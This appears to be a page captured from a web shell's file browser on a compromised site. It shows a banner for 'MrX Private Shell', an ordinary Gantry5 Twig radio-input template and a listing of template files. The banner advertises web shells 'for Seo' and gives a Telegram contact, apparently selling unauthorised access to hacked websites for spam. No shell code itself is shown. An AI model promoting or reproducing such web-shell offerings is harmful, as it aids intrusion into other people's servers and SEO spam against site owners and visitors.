__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{% extends 'forms/' ~ layout|default('field') ~ '.html.twig' %}
{% set outline = field.outline ?: nested(data, scope ~ field.outline_field) %}
{% set atoms = field.atoms ?: (outline ? gantry.outlines.getAtomInstances(outline, field.atom, false) : []) %}
{% block label %}
{{ parent() }}
<div><span class="particle-label-subtype badge">{{ field.atom }}</span></div>
{% endblock %}
{% block input %}
<div id="{{ field.id }}">
{% if atoms %}
<div class="input-group">
{% for atom in atoms %}
<label for="{{ field.id|default(scope ~ name) ~ '-' ~ atom.id }}">
<input
id="{{ field.id|default(scope ~ name) ~ '-' ~ atom.id }}"
type="radio"
name="{{ (scope ~ name)|fieldName }}"
value="{{ atom.id }}"
required="required"
{% if value == atom.id %}checked="checked"{% endif %}
/>
<span>{{ atom.title }}</span>
<i class="fa fa-info-circle fa-fw" aria-hidden="true"></i>
</label>
{% endfor %}
</div>
{% else %}
{{ 'GANTRY5_PLATFORM_NO_INHERITANCE_SELECT_OUTLINE'|trans }}
{% endif %}
</div>
{% endblock %}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| atoms.html.twig | File | 1.4 KB | 0775 |
|
| inherit.html.twig | File | 226 B | 0775 |
|
| module.html.twig | File | 890 B | 0775 |
|
| outlines.html.twig | File | 1.23 KB | 0775 |
|
| particle.html.twig | File | 1.48 KB | 0775 |
|
| particles.html.twig | File | 1.41 KB | 0775 |
|
| widget.html.twig | File | 1.76 KB | 0775 |
|